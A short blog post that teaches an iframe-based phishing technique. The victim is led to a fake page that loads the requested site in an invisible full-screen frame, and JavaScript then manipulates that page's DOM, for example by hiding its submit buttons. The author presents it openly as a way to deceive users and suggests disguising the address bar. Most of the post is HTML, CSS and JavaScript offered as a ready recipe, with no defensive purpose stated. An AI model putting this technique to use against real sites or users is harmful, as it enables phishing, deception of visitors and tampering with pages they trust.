Javascript: Frame Hijacking Phishing

Oct27
  • Share/Bookmark

Difficulty: ★★★★★

This hack is often used for frame hijacking/phishing technics. Imagine there’s a webpage (not yours) on where you can not run code on. For example in Salesforce there are pages on which you can not implement your own code.
I found out a way how you can manipulate others pages; and it’s so damn mean. (gnehgnehgneh).

Before showing you any code I will tell you the basics of this idea:
1. Let the user go to a different URL then the one they want.
2. This page contains only an iframe of the requested page, the user wants to see.
The iframe loads 100%, so the user won’t see a difference. (And ofcourse you can also trick the URL adress in the adress bar so the user can not read it aswell.)
3. Beside the iframe, this fake page also contains code. With this code you are controlling the codes within the iframe. (Yes you can, it’s all about DOM scripting baby!)

Allright, show me the money!

First you’ll have to add the secret iframe in your HTML. This is no rocketscience; just make sure you give the iframe an ID so you can trigger it later on. An onload javascript function. And it’s much nicer if you give a 100% width and height, scrolling 1 and frameborder and margin 0. So you almost can not see the iframe.

<iframe id="theLoadedPage"
	src="http://www.blankURL.com"
	onload="hjackFrames('theLoadedPage')" name="theLoadedPage" width="100%"
	height="100%" scrolling="1" frameborder="0" marginwidth="0"
	marginheight="0">
<p>Loading...</p>
</iframe>

If you are a perfectionist like me, then add some extra css styles, to make it even more nicer; and let the iframe overrule the orginal screen.

html {
	overflow: hidden;
}

html,body {
	width: 100%;
	height: 100%;
	margin: 0px;
	padding: 0px;
}

iframe {
	overflow: hidden-x;
}

Now start writing the code trick.
First you’ll need a main function, which request the page in the iframe on 100%.

function main() {
	var loadPageSrc = document.getElementById("theLoadedPage");
	loadPageSrc .setAttribute("src","http://www.newLoadedPage.com");
}

Now here’s the hack. I built it in a try/catch closure handle errors.

function hjackFrames(id){
try {
		var frame=document.getElementById(id);
		var inside;
		if (frame.tagName!='IFRAME'){
			return;
		}

		inside=window.frames[id].document.getElementsByTagName('BODY')[0];

/* this part is not part of the hack, but from here you can manipulate the page,
for example; hide all submit buttons. */
		var allInputs=[];
		allInputs=inside.getElementsByTagName('INPUT');
		for (var i=0;i<allInputs.length;i++){
			if(allInputs[i].type == "submit"){
				allInputs[i].style.display = "none";
			}
		}

} catch(err) {
                  /* do other nice things, here since the hack is failing */
	}
}

, / , / , / , / , / , / , / , / , /

  » Post your comment, there are no comments yet. »
Posted in hacking, javascript, salesforce |

Leave a comment